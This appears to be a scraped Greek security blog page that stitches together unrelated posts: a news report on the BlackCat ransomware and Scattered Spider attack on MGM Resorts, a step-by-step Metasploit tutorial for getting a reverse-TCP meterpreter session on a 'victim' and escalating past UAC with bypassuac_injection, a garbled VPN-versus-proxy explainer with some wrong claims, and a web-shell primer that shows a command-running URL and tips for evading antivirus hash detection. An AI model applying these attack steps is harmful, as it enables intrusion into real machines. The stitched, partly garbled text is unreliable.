Μια θυγατρική της ομάδας BlackCat ransomware, επίσης γνωστή ως APLHV, βρίσκεται πίσω από την επίθεση που διέκοψε τις λειτουργίες της MGM Resorts, αναγκάζοντας την εταιρεία να κλείσει τα συστήματα πληροφορικής. Σε ανακοίνωσή της, η ομάδα BlackCat ransomware ισχυρίζεται ότι είχε διεισδύσει στην υποδομή της MGM από την Παρασκευή και κρυπτογράφησε περισσότερους από 100 ESXi hypervisors, αφού η εταιρεία έθεσε εκτός λειτουργίας την εσωτερική υποδομή. Η ομάδα αναφέρει ότι εξαφάνισε δεδομένα από το δίκτυο και διατηρεί πρόσβαση σε ορισμένες από τις υποδομές της MGM, απειλώντας ότι θα αναπτύξει νέες επιθέσεις εάν δεν επιτευχθεί συμφωνία για την καταβολή λύτρων.
Ανάπτυξη Ransomware και κλοπή δεδομένων της MGM
Ο ερευνητής κυβερνοασφάλειας vx-underground αποκάλυψε πρώτος την είδηση ότι οι χάκερς που συνδέονται με την επιχείρηση ransomware ALPHV φέρεται να παραβίασαν την MGM μέσω επίθεσης κοινωνικής μηχανικής. Επικαλούμενες πηγές που γνωρίζουν το θέμα, αναφορές στο διαδίκτυο, ανέφεραν αργότερα ότι ο χάκερ που παραβίασε την MGM Resorts εντοπίζεται από εταιρείες κυβερνοασφάλειας ως Scattered Spider (Crowdstrike). Άλλες εταιρείες χρησιμοποιούν διαφορετικά ονόματα για να εντοπίσουν τον ίδιο δράστη απειλής: 0ktapus (Group-IB), UNC3944 (Mandiant) και Scatter Swine (Okta).
Σύμφωνα με τους δημοσιογράφους του Bloomberg, οι Scattered Spider παραβίασαν επίσης το δίκτυο της Caesars Entertainment, η οποία, σε ανακοίνωση της αμερικανικής Επιτροπής Κεφαλαιαγοράς την Πέμπτη, έδωσε σαφή υπαινιγμό ότι πλήρωσε τον επιτιθέμενο για να αποφύγει τη διαρροή των δεδομένων πελατών που εκλάπησαν κατά την επίθεση. Η απαίτηση για λύτρα φέρεται να ήταν 30 εκατομμύρια δολάρια. Στη σημερινή ανακοίνωσή της, η BlackCat αναφέρει ότι η MGM Resorts παρέμεινε σιωπηλή σχετικά με το κανάλι επικοινωνίας που δόθηκε, υποδεικνύοντας ότι η εταιρεία δεν έχει καμία πρόθεση να διαπραγματευτεί την καταβολή λύτρων. Οι χάκερς τονίζουν ότι η μόνη ενέργεια που είδαν από την MGM ήταν ως απάντηση στην παραβίαση, αποσυνδέοντας κάθε έναν από τους διακομιστές Okta Sync τους, αφού έμαθαν ότι παραμονεύαμε στους δικούς τους
Προς το παρόν, οι χάκερς δηλώνουν ότι δεν γνωρίζουν τι είδους δεδομένα έκλεψαν από την MGM, αλλά υπόσχονται να αποσπάσουν σχετικές πληροφορίες και να τις μοιραστούν στο διαδίκτυο, εκτός αν καταλήξουν σε συμφωνία με την MGM. Για να πιέσουν ακόμη περισσότερο την εταιρεία να πληρώσει, η BlackCat απείλησε ότι θα χρησιμοποιήσει την τρέχουσα πρόσβασή της στις υποδομές της MGM για να “πραγματοποιήσει πρόσθετες επιθέσεις”.
Ποιοι είναι οι Scattered Spider
Οι Scattered Spider πιστεύεται ότι είναι μια ομάδα χάκερς που είναι γνωστό ότι χρησιμοποιούν ένα ευρύ φάσμα επιθέσεων κοινωνικής μηχανικής για να παραβιάσουν εταιρικά δίκτυα. Αυτές οι επιθέσεις περιλαμβάνουν την υποδυόμενη προσωπικότητα του help desk για να εξαπατήσει τους χρήστες ώστε να τους παράσχουν διαπιστευτήρια, επιθέσεις ανταλλαγής SIM για να καταλάβουν τον αριθμό τηλεφώνου μιας στοχευμένης κινητής συσκευής, καθώς και επιθέσεις κόπωσης και phishing MFA για να αποκτήσουν πρόσβαση σε κωδικούς ελέγχου ταυτότητας πολλαπλών παραγόντων. Σε αντίθεση με τους περισσότερους συνεργάτες ransomware που προέρχονται από χώρες της ΚΑΚ, οι ερευνητές πιστεύουν ότι η ομάδα χάκερ αποτελείται από αγγλόφωνους εφήβους και νεαρούς ενήλικες ηλικίας 16-22 ετών. Επιπλέον, λόγω των παρόμοιων τακτικών, οι ερευνητές πιστεύουν ότι η ομάδα επικαλύπτεται με την ομάδα hacking Lapsus$, η οποία είχε παρόμοια σύνθεση ως προς τα μέλη και τις τακτικές.
Μια εκστρατεία Scattered Spider με την ονομασία “0ktapus” χρησιμοποιήθηκε για να στοχεύσει πάνω από 130 οργανισμούς για να κλέψει διαπιστευτήρια ταυτότητας Okta και κωδικούς 2FA, με μερικούς από αυτούς τους στόχους να περιλαμβάνουν τις T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC και Best Buy. Μόλις οι απειλητικοί φορείς παραβιάσουν ένα δίκτυο, έχουν ιστορικό χρήσης επιθέσεων “Φέρε τον δικό σου ευάλωτο οδηγό” για να αποκτήσουν αυξημένη πρόσβαση σε μια παραβιασμένη συσκευή. Αυτή η πρόσβαση χρησιμοποιείται στη συνέχεια για περαιτέρω πλευρική εξάπλωση στο δίκτυο, ενώ παράλληλα κλέβουν δεδομένα και τελικά αποκτούν πρόσβαση σε διαπιστευτήρια διαχειριστή. Μόλις αποκτήσουν πρόσβαση με διαπιστευτήρια διαχειριστή, μπορούν να πραγματοποιήσουν περαιτέρω επιθέσεις, όπως η πειρατεία της διαχείρισης ενιαίας σύνδεσης, η καταστροφή αντιγράφων ασφαλείας και πιο πρόσφατα, η ανάπτυξη του ransomware BlackCat/ALPHV για την κρυπτογράφηση συσκευών. Ενώ το στοιχείο ransomware είναι μια σχετικά νέα τακτική της ομάδας χάκερ, σχεδόν όλες οι επιθέσεις τους περιλαμβάνουν εκβιασμό, όπου απαιτούν λύτρα εκατομμυρίων δολαρίων σε αντάλλαγμα για να μην δημοσιεύσουν δεδομένα ή για να λάβουν ένα κρυπτογράφημα.
Το UAC (User Account Control) είναι o έλεγχος λογαριασμού χρήστη είναι ένα προειδοποιητικό μήνυμα που μας ενημερώνει και ζητάει την επιβεβαίωση μας κάθε φορά που θέλουμε να τρέξουμε ένα αρχείο που απαιτεί δικαιώματα διαχειριστή. Μια φωτογραφία..
Ωραία αφού μάθαμε τι είναι το UAC πάμε να ξεκινήσουμε.. αρχικά θα δείξω έναν πολύ απλό τρόπο για να πάρουμε meterpreter session (access) στο θύμα μας.
Ανοίξτε το terminal και > msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TOPIKH IP MAS (IFCONFIG)] LPORT=[RANDOM PORT PX 4040] -f exe > ~/Desktop/root.exe
Αυτό για windows μηχανήματα.. μπορείτε να το ανεβάσετε στον apache για να το κατεβάσει το θύμα σας.
Ανοίγουμε το metasploit (service postgresql start + msfconsole) μπορείτε να το κάνετε και με το armitage που παρέχει γραφικό περιβάλλον.
Θα χρησιμοποιήσουμε το κλασικό multi/handler οπότε use exploit multi/handler και πατάμε enter.
Βάζουμε τα settings [show options] το payload το lhost + lport τα οποία τα βάλαμε στην δημιουργία το κακόβουλου αρχείου (με το msfvenom).
Και πατάμε exploit.. αφού τρέξει το θύμα μας το αρχείο βλέπουμε ότι έχουμε πρόσβαση μπορούμε να κάνουμε migrate σε κάποιο άλλο process.
Αν πατήσουμε getsystem θα μας έχει error.. οπότε πάμε. Πατάμε background.. το session μας .
Τώρα θα τρέξουμε το exploit use exploit/windows/local/bypassuac_injection για να κάνουμε bypass.. βάζουμε σαν setting το session [set SESSION 1] και πατάμε exploit.
Μας άνοιξε νέο session [sessions] και πατάμε getsystem και βλέπουμε.. got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Ποιες είναι οι διαφορές μεταξύ VPN και Proxy Servers ( Διακοσμητές Μεσολάβησης ) + πλήρης οδηγός
Τόσο το VPN όσο και ο διακομιστής μεσολάβησης( Proxy ) χρησιμοποιούνται για τη διευκόλυνση της σύνδεσης μεταξύ του πελάτη και του διακομιστή με την απόκρυψη της διεύθυνσης IP και είναι ελαφρώς διαφορετικά στον τρόπο χειρισμού των δεδομένων.
Στον σύγχρονο κυβερνοχώρο, αντιμετωπίσαμε πολλές ανησυχίες για την ιδιωτική ζωή μας, τόσο τα VPN όσο και το Proxy το χειρίζονται σημαντικά.
Είναι πολύ σημαντικό να έχουμε τη γνώση της διαφοράς μεταξύ του VPN vs Proxy και του σεναρίου όπου μπορούμε να χρησιμοποιήσουμε και πού δεν μπορούμε.
Τι είναι το Proxy:
Ο Proxy Server ή διακομιστή μεσολάβησης είναι ένας ενδιάμεσος κόμβος μεταξύ πελάτη και διαδικτύου που λαμβάνει αίτημα από τον Πελάτη και τον μεταβιβάζει στον διαφορετικό διακομιστή και παρέχει έμμεσες υπηρεσίες δικτύου στον πελάτη. πρωταρχικός σκοπός του Proxy είναι να φιλτράρει την επικίνδυνη κίνηση στο Διαδίκτυο εφαρμόζοντας τον αυστηρό κανόνα για να εξασφαλίσει την ανωνυμία του πελάτη.
Μας επιτρέπει να κρύβουμε το IP του πελάτη και την τοποθεσία από την τοποθεσία που επισκέπτεται. συνδέοντας σε έναν από τους διακομιστές μεσολάβησης, το αίτημα πελάτη προωθείται στον proxy, τότε επεξεργάζεται το αίτημα του πελάτη και το αποτέλεσμα θα επιστραφεί στον πελάτη.
Τι είναι το VPN:
Το VPN ή το Proxy Server Δίκτυο είναι μια τεχνολογία που αναπτύχθηκε για την παροχή ασφαλούς πρόσβασης μέσω του Διαδικτύου για αιτήματα πελατών μέσω κρυπτογραφημένων σηράγγων. Το VPN ανακατευθύνει το αίτημα της πλευράς του πελάτη μέσω του απομακρυσμένου διακομιστή, ο οποίος εκτελείται από παρόχους υπηρεσιών VPN. βοηθά να διασφαλιστεί ότι τα ευαίσθητα δεδομένα παραμένουν ιδιωτικά κατά τη διάρκεια της μετάδοσης μέσω διαδικτύου από ένα μέρος σε άλλο.
VPN Ασπίδα των χρηστών περιήγηση δραστηριότητα και παρακάμπτοντας τη λογοκρισία του Διαδικτύου . Το λογισμικό VPN κρυπτογραφεί το αίτημα του χρήστη ακόμη και πριν να το δει ο Παροχέας Υπηρεσιών Διαδικτύου και να ανακατευθυνθεί σε διάφορους κόμβους VPN και σε απάντηση στον πελάτη.
Proxy vs VPN Security
Όταν πρόκειται για την ασφάλεια, το VPN βρίσκεται μπροστά από τους Proxy Server, τα VPN έχουν κρυπτογραφημένη σήραγγα για να μεταφέρουν τα δεδομένα με ασφάλεια, αλλά αυτό δεν συμβαίνει με το Proxy.
Με το VPN θα έχετε μια μοναδική διεύθυνση IP και ένα ασφαλές τούνελ που θα δημιουργηθεί ανάμεσα σε εσάς και τον στόχο που θέλετε να συνδεθείτε με αυτό.
Η σήραγγα κρυπτογράφησης VPN υποστηρίζει την κίνηση που δρομολογείται με όλα τα πρωτόκολλα Internet με εξελιγμένες δυνατότητες απορρήτου και ασφάλειας.
Τα VPN είναι γνωστά για την ασφάλεια και την αξιοπιστία, είναι εύκολο για οποιονδήποτε να απενεργοποιήσει ή να πάει στην υπηρεσία VPN.
Έχοντας μια κρυπτογραφημένη σήραγγα, τα VPN εξασφαλίζουν τα δεδομένα σας από τους χάκερ, ακόμη και αν είστε συνδεδεμένοι με ανοιχτά hotspots WiFi.
Η εφαρμογή VPN υποστηρίζει επίσης για διάφορες πλατφόρμες PlayStation, SmartTV, OS / X, iPhone, Windows, Android, και άλλες συσκευές όπως AppleTV , Chromecast , Roku, Xbox και τις συσκευές δικτύου υποστήριξης.
Με την κρυπτογράφηση AES-256 και τα πιστοποιητικά SSL, δεν υπάρχει πιθανότητα κάποιος εισβολέας να εισέλθει στα δεδομένα σας και ακόμη και οι κυβερνητικές αρχές δεν μπορούν να λάβουν τα δεδομένα σας. Για να κατασκευάσει σήραγγα χρησιμοποιεί υψηλής ασφαλείας πρωτόκολλα PPTP, L2TP, SSTP, OpenVPN.
Βοηθά στην απόκρυψη της πραγματικής θέσης και μπορείτε να φτάσετε στους αποκλεισμένους ιστότοπους, βίντεο και άλλο περιεχόμενο που έχει αποκλειστεί στην τοποθεσία σας με ασφάλεια.
Ασφάλεια Proxy Server
Οι Proxy Server γεφυρώνουν τη σύνδεση στο Internet, καλύπτουν μόνο τη διεύθυνση IP του υπολογιστή σας και δεν θα κρυπτογραφούν τα περιεχόμενα.
Χρησιμοποιούν για να επικοινωνούν με το πρωτόκολλο HTTP ή SOCKS έτσι υπάρχει κρυπτογράφηση με τους Proxy Servers, οι κυβερνοεγκληματίες μπορούν να ξεμπερδεύουν τα δεδομένα που ταξιδεύουν μέσω ενός διακομιστή μεσολάβησης.
Σε ορισμένες περιπτώσεις, ακόμη και οι κυβερνοεγκληματίες διαφημίζουν έναν Proxy Server ( διακοσμητή μεσολάβησης ) για να κλέψουν την ταυτότητά σας. Επίσης, γενικά οι διακομιστές μεσολάβησης είναι υπερφορτωμένοι με επισκέπτες και επηρεάζουν τρομερά την ταχύτητα σύνδεσης.
Οι διακομιστές μεσολάβησης ( Proxy Server ) HTTP είναι πιο εξοικειωμένοι και είναι γύρω από πολύ καιρό και οι διακομιστές Socket Secure (SOCKS5) χρησιμοποιούνται για τη σύνδεση με υπηρεσίες torrent, διακομιστές FTP και web. Σε σύγκριση με το κανονικό proxy SOCKS5 Βελτιωμένη ασφάλεια.
Ο διακομιστής μεσολάβησης SOCKS5 είναι πολύ καλός εάν πρόκειται να χρησιμοποιήσετε ένα torrent ή μια υπηρεσία P2P, αλλά στερείται ιδιωτικότητας. Εάν κάνετε πολλά surfing στο διαδίκτυο και απλά θέλετε να παρακάμψετε τους ιστοτόπους που μπλοκάρονται γεωγραφικά και μέσω του τείχους προστασίας, τότε οι διακομιστές μεσολάβησης είναι ιδανικοί για εσάς.
Proxy vs VPN Speed
Το VPN vs Proxy Speed είναι μία από τις πιο σημαντικές ανησυχίες κατά την πρόσβαση στο διαδίκτυο χρησιμοποιώντας Proxy και VPN. Όταν μιλάμε για ταχύτητα, ο διακομιστής μεσολάβησης ( Proxy Server ) είναι πάντα ταχύτερος από το VPN.
Κόστος Proxy έναντι VPN
ελάχιστος χρόνος downtime, λίστα API Accessible Proxy και όλες οι ταχύτητες ανερχόμενης ζεύξης διακομιστών μεσολάβησης.
τα βοηθητικά βοηθήματα περιέχουν πολλούς διακομιστές που επιτρέπουν στους χρήστες να επιλέξουν διακομιστές σε διαθέσιμες χώρες. Σε αυτή την περίπτωση, οι ελεύθεροι πληρεξούσιοι είναι περιορισμένοι και δίνουν χαμηλό εύρος ζώνης και επιβραδύνουν την πρόσβαση.
προγραμματίζετε να περάσετε οπουδήποτε από 5 ευρώ τον μήνα για βασικά σχέδια και η τιμή εξαρτάται επίσης από την ποιότητα των πληρεξουσίων και των παρόχων.
Τα δίκτυα VPN είναι τα καλύτερα για …
Τα VPN εξασφαλίζουν τα δεδομένα σας από τα αδιάκριτα μάτια, όλοι από τους χάκερ σε κυβερνητικούς αξιωματούχους που χρησιμοποιούν υπηρεσίες VPN για την προστασία των προσωπικών δεδομένων. Επιτρέπει στους χρήστες να στέλνουν και να λαμβάνουν δεδομένα και να παραμένουν ανώνυμα στο Διαδίκτυο.
Τα περισσότερα δίκτυα VPN προσφέρουν πολλαπλές ταυτόχρονες συνδέσεις, έτσι ώστε οι χρήστες να μπορούν να συνδέσουν όλες τις συσκευές στο σπίτι με το VPN.
Με το VPN, όλη η επισκεψιμότητά σας περνάει μέσω ενός δικτύου με συντονισμό, οπότε ακόμα και ο ISP δεν μπορεί να δει την κυκλοφορία που πηγαίνει με το δίκτυο σήραγγας.
Εάν είστε υπάλληλος, μπορείτε να συνδεθείτε με το δίκτυο του γραφείου σας με ασφάλεια μέσω του Smartphone, του tablet και του υπολογιστή μέσω ενός VPN.
Το VPN είναι το καλύτερο για την προστασία πολύτιμων πληροφοριών στο διαδίκτυο.
Σας επιτρέπει να αγοράσετε online με πιστωτικές κάρτες.
Σας επιτρέπει να περιηγείστε με ασφάλεια με δημόσια Hotspots Wi-Fi.
Με το VPN μπορείτε να προσεγγίσετε τους αγαπημένους σας κινηματογραφικούς ιστότοπους, παρόλο που έχουν αποκλειστεί στη χώρα σας.
Με τον χρήστη του VPN ca Να παρακάμψετε τη λογοκρισία του ιστού και την επιτήρηση περιεχομένου.
Το VPN σάς δίνει τη δυνατότητα να πραγματοποιήσετε ασφαλή επικοινωνία μεταξύ των τοποθεσιών.
Μερικοί από τους παρόχους VPN προσφέρουν επίσης τους αποκλεισμούς διαφημίσεων.
Προστατεύει ενώ συνδεθήκατε με τους ιστότοπους torrent.
Με το VPN στη θέση του, μπορείτε να αποκτήσετε πρόσβαση στους ιστότοπους που αποκλείστηκαν γεωγραφικά.
Τα VPN παρέχουν ακεραιότητα, γεγονός που διασφαλίζει ότι το πακέτο δεν μεταβάλλεται όταν μεταφέρεται.
Μια ανωνυμοποίηση VPN θα επέτρεπε την κοινή χρήση αρχείων Peer-to-Peer που έχει αποκλειστεί σε πολλές χώρες.
Για να πούμε λίγο ποιο απλά, το VPN είναι ένα δίκτυο ευρείας περιοχής που διατηρεί τη λειτουργικότητα και την ασφάλεια όπως στο ιδιωτικό δίκτυο. Αυτές είναι οι κύριες χρήσεις του VPN και η χρήση ποικίλει ανάλογα με τις απαιτήσεις των χρηστών.
Τα VPN δεν είναι για ..
Τα δίκτυα VPN ενδέχεται να επιβραδύνουν τη σύνδεση στο Internet
Ενδέχεται να παρουσιαστεί πτώση ταχύτητας με τη σύνδεσή σας στο διαδίκτυο όταν δρομολογείται μέσω VPN λόγω της υψηλής ποιότητας κρυπτογράφησης 256-bit. Μερικές φορές η σύνδεση VPN ενδέχεται να επιβραδύνει την ταχύτητα του Internet εάν υπάρχουν πάρα πολλοί χρήστες που είναι ενεργοί στο διακομιστή.
Γενικά, η ταχύτητα VPN εξαρτάται από την ταχύτητα του Internet σας, εάν βρίσκεστε στην Ινδία και χρησιμοποιείτε διακομιστή VPN στις Η.Π.Α. τότε η σήραγγα σύνδεσης σας πάνω από μια σειρά τελικών σημείων που μπορεί να επιβραδύνουν τη σύνδεση. Επομένως, συνιστάται στους χρήστες να μην χρησιμοποιούν σωστά το VPN.
Είμαι συνδεδεμένος σε ένα VPN, έτσι μπορώ να κάνω κάτι online;
Εάν βρίσκεστε υπό VPN τότε δεν μπορούμε να πούμε ότι είστε 97% ανώνυμοι, ο πάροχος VPN μπορεί να δει τα αρχεία καταγραφής πρόσβασης και θα κρατήσει τα αρχεία καταγραφής για τουλάχιστον 6 μήνες, ανάλογα με τη χώρα.
Όλα τα VPN δεν είναι τα ίδια και υπάρχουν διάφοροι παράγοντες που πρέπει να ληφθούν υπόψη κατά την ταξινόμησή τους με βάση τις ανάγκες, τις υποστηριζόμενες πλατφόρμες, τον αριθμό των διαθέσιμων εξυπηρετητών.
Επίσης, οι χρήστες θα πρέπει να γνωρίζουν ότι τα δίκτυα VPN δεν θα σας εξασφάλιζαν από το Phishing ή από τις επιθέσεις malware και ransomware .
Μπορείτε να αποκτήσετε το δωρεάν VPN, αλλά η σύνδεση θα είναι τρομερή και θα υποφέρει σοβαρά με τους περιορισμούς σχετικά με το χαμηλό εύρος ζώνης και ορισμένοι πάροχοι πωλούν ακόμη και τα προσωπικά σας δεδομένα.
Οι Proxy Servers είναι οι καλύτεροι για …
Οι Proxy χρησιμοποιούνται ευρέως για να παρακάμψουν τους αποκλεισμένους ιστότοπους στο ISP ή σε επίπεδο οργανισμού.
Proxy Server που χρησιμοποιούνται σε εταιρικά περιβάλλοντα για να προστατεύουν την εσωτερική τους υποδομή δικτύου.
Το Proxies περιέχει έναν πολύ καλό μηχανισμό προσωρινής αποθήκευσης, ώστε να μπορεί να χρησιμοποιηθεί για να επιταχύνει τη διαδικασία περιήγησης.
Κρύβει την αρχική σας διεύθυνση IP και εμφανίζει τη διεύθυνση IP κατά της παραποίησης , οπότε ο ιστότοπος προορισμού δεν μπορεί να διαβάσει την αρχική σας διεύθυνση IP.
Οι Proxy Server σας κάνει να παραμείνετε ανώνυμοι σε απευθείας σύνδεση, αλλά δεν θα κρυπτογραφήσει την κίνηση όπως το VPN.
Με μερικούς από τους Proxy μπορείτε να έχετε διπλή προστασία καθώς έχουν ενσωματωμένο το τείχος προστασίας που σταματάει τις εισβολές.
Οι διαχειριστές των διακομιστών μπορούν να χρησιμοποιούν διακομιστές μεσολάβησης ( Proxy Servers ) για να αποκλείουν ιστότοπους που σχετίζονται με την κοινωνική δικτύωση, τα παιχνίδια, τους ιστότοπους για ενήλικες για τους υπαλλήλους του οργανισμού.
Υπάρχουν χιλιάδες δωρεάν Proxy Servers στο διαδίκτυο, επιλέγοντας ένα Proxy πρέπει να εξετάσετε προσεκτικά το χρόνο διακοπής.
Με τη βοήθεια των διακομιστών μεσολάβησης ( Proxy Servers ), μπορείτε να φτάσετε στους ιστότοπους που έχουν αποκλειστεί γεωγραφικά.
Η εφαρμογή του Proxy Server είναι πολύ απλή και τα Proxy είναι τόσο περιορισμένα με τα προγράμματα περιήγησης.
Ορισμένα από τα πρωταρχικά Proxy θα έσωζαν το εύρος ζώνης των εταιρειών.
Οι Proxy δεν είναι για …
Οι διακομιστές μεσολάβησης δεν είναι ασφαλείς για επικοινωνία μέσω ηλεκτρονικού ταχυδρομείου και πρωτόκολλα μεταφοράς αρχείων και οι διακομιστές μεσολάβησης είναι καλή μόνο για την επικοινωνία μέσω διαδικτύου.
Είναι λιγότερο ασφαλής από την αποθήκευση όλων των κωδικών πρόσβασης των χρηστών στον ενεργό κατάλογο. Δεν είναι συμβατά με όλα τα πρωτόκολλα δικτύου.
Με τα τείχη προστασίας του διακομιστή μεσολάβησης, η διαμόρφωση είναι πολύ δύσκολη σε σύγκριση με άλλα σύγχρονα τείχη προστασίας ημέρας.
Εάν ο διακομιστής μεσολάβησης παραβιάζεται, τότε υπάρχει πιθανότητα κλοπής ταυτότητας, τότε θα πρέπει να αποφύγετε την εισαγωγή τραπεζικών διαπιστευτηρίων σύνδεσης όταν συνδέεστε μέσω διακομιστή μεσολάβησης.
Ο διαχειριστής του διακομιστή μεσολάβησης μπορεί να ξεγελάσει όλες τις λεπτομέρειες που ταξιδεύουν μέσω του διακομιστή και επίσης είναι κακοί στο χειρισμό λειτουργιών όπως τα σενάρια Flash, Java και JavaScript.
Οι διακομιστές μεσολάβησης έχουν μερικά σοβαρά μειονεκτήματα ασφαλείας εάν η μεμονωμένη θύρα ανοιχτή με τον διακομιστή μεσολάβησης και οι επιτιθέμενοι μπορούν να απαριθμήσουν μαζί τους.
Εάν υπάρχει κάποιο πρόβλημα κατά τη δημιουργία μιας σύνδεσης, τότε με το διακομιστή μεσολάβησης είναι δύσκολο να αντιμετωπίσετε προβλήματα και δεν είναι συμβατά με όλα τα πρωτόκολλα δικτύου.
Συζητήσαμε ήδη ότι η μνήμη cache αυξάνει την ταχύτητα, αλλά από την άλλη υπάρχουν ορισμένα μειονεκτήματα. Η κρυφή μνήμη εμφανίζει την εμφάνιση των παλαιών περιεχομένων.
Δεν είναι όλες οι Proxy Servers καλή, θα πρέπει να αφιερώσετε πολύ χρόνο για να βρείτε ένα σωστό πληρεξούσιο. Μια καλή αλυσίδα μεσολάβησης παρέχει μόνο καλύτερες επιδόσεις.
Συμπέρασμα:
Απλά και το Proxy Server και το VPN δημιουργήθηκαν για να κρύψουν την κίνηση στο διαδίκτυο και με το VPN η κυκλοφορία θα περάσει μέσω σήραγγας δικτύου, αλλά τα VPN χαμηλής ποιότητας θα εκθέσουν σοβαρές απειλές.
Οι Proxy Servers είναι πολύ δύσκολο να εγκατασταθούν και δεν θα κρυπτογραφήσουν τα δεδομένα, χρησιμοποιώντας ένα VPN και ο πληρεξούσιος μπορεί να επιβραδύνει δραματικά τη σύνδεση. Όταν πρόκειται για την κρυπτογράφηση, τα VPN είναι τα καλύτερα και προσφέρουν κρυπτογράφηση με το πρότυπο keyize.
Κάποιος πρέπει να είναι πολύ προσεκτικός στην επιλογή ενός διακομιστή μεσολάβησης, επειδή οι επιτιθέμενοι επίσης εκτελούν τους διακομιστές μεσολάβησης για να εμποδίζουν την κίνηση του δικτύου.
Όταν πρόκειται για διακομιστή μεσολάβησης, μπορείτε να αποκρύψετε μόνο την επισκεψιμότητα HTTP, αλλά με VPN, μπορείτε να αποκρύψετε την επισκεψιμότητα που αποστέλλεται μέσω όλων των πρωτοκόλλων.
Αν θέλετε να συγκρίνετε το VPN και το Proxy που είναι καλύτερα, εξαρτάται εντελώς από τις απαιτήσεις σας. Δεν έχει σημασία αν επιλέξετε να χρησιμοποιήσετε έναν διακομιστή μεσολάβησης ή το VPN, αλλά πρέπει να διασφαλίσετε ότι η υπηρεσία που επιλέξατε μπορεί να λύσει την απαίτηση.
Tα Web shells είναι μικρά προγραμματα η σκριπτακια τα οποια μπορούν να ανεβάσουν (upload) σε ευπαθείς servers και μετα να ανοιχτουν σε ενα προγραμμα περιηγησης παρεχοντας ενα web interface που θα εκτελει εντολες συστηματος.
Με λιγα λογια ειναι backdoors (οι λεγομενες κερκοπορτες) οι οποιες τρεχουνε απο ενα προγραμμα περιηγησης.
Για καθε server,το σκριπτακι η το web shell που θα χρησιμοποιηθει θα πρεπει να ειναι στη γλωσσα που τρεχει η χρησιμοποιει ο sever.(php,asp κτλ).Ετσι λοιπον, αν προκειται για εναν
php server τοτε θα πρεπει να βρουμε ενα php shell.Tα Web shells τρεχουν λιγο φτωχα στο παγκοσμιο ιστο για αυτο το λογο δεν υπαρχει καποια υποδοχη επικοινωνιας οπως χρησιμοποιητε στη περιπτωση του reverse shell οπου ο web server θα πρεπει να συνδεθει με ενα προγραμμα οπως πχ το netcat στου χακερ το μηχανημα ομως.
Για αυτο το λογο τα web shells ειναι πολυ γρηγορα στο στησιμο τους και την εφαρμογη τους.Ωστόσο το μειονέκτημα τους είναι ότι δεν έχουν το διαδραστικο ύφος ενός τερματικού.
Τα web shells παρεχουν ενα γρηγορο γραφικο περιβαλλον που μπορουν να κανουν τα ακολουθα.
1) να περιηγηθουν σε καταλογους
2) να εμφανισουν αρχεια
3) να παρεμβουν σε αρχεια η αν γραψουν αρχεια
4) να κατεβασει αρχεια
5) να διαγραψει αρχεια
6) να ανεβασει αρχεια
7) να εκετελεσει sql εντολες
8) να κανει bypass στην ασφαλεια
9) να εχει προσβαση σε καταλογους-υποκαταλογους.
10) να εκτελεσει εντολες των shells.
Web shells που υπαρχουν στο kali-linux βρισκονται σε αυτη τη διαδρομη
/usr/share/webshells/
Παρολο που περιεχει αρκετα χρησιμα web shells δεν περιέχει τα πιο ”καταστροφικα” που εχουν οι χακερς.
Το Web shell μπορει να τρεξει απο ενα προγραμμα περιηγησης με ενα url οπως αυτο http://target.com/simple-backdoor.php?cmd=cat+/etc/password
H Get παράμετρος cmd περιεχει την εντολή που θα τρεξει στο συστημα.Το σκριπτακι θα τρεξει την εντολη και θα στειλει πισω το αποτελεσμα.
Οι παράμετροι Get δεν είναι ο μονος τροπος να στελνουμε εντολες. Εντολες μπορουν να σταλθουν μεσω post μεσω cookies η ακομα και απο http.
Οι backdoors εχουν και τους περιορισμους τους.Πολλοι web servers εχουν απενεργοποιησει τη λειτουργια php που χρησιμοποιητε για να τρεξει εντολες.
Σε αυτη τη περιπτωση το web shell αποτυγχανει να τρεξει την εντολη.
Επισης ο σερβερ στοχος μπορει να εχει και firewall antivirus που εντοπιζουν τετιοα shells.H ανιχνευση βασιζεται στο hash md5 του αρχειου.
Σε αυτη τη περιπτωση η θα πρεπει να τροποποιησουμε το αρχειο σε μια καταληξη που να μην ειναι ανιχνευσιμη η να γραψουμε το δικο μας shell.
Tο να γραψουμε ενα δικο μας shell δεν ειναι δυσκολο εαν βεβαια γνωριζουμε τη γλωσσα php.